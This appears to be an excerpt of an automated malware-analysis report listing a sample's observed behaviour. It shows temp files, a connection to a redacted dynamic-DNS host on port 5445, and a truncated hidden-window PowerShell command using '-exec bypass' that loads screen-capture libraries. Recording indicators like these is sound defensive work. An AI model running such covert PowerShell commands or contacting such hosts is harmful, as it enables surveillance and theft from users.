Technical Information
- %TEMP%\1600227627964.tmp
- %TEMP%\1600227652222.tmp
- %TEMP%\1600227652222.tmp
- http://sv#######.webredirect.org:5445/ via sv######m.webredirect.org
- DNS ASK sv######m.webredirect.org
- ClassName: 'Static' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -c "[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[Reflection.Assembly]::LoadWithPartialName('System.Drawing');$Screen = [System.Windows.Forms.SystemInformatio...' (with hidden window)
- '%ProgramFiles%\internet explorer\iexplore.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -c "[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[Reflection.Assembly]::LoadWithPartialName('System.Drawing');$Screen = [System.Windows.Forms.SystemInformatio...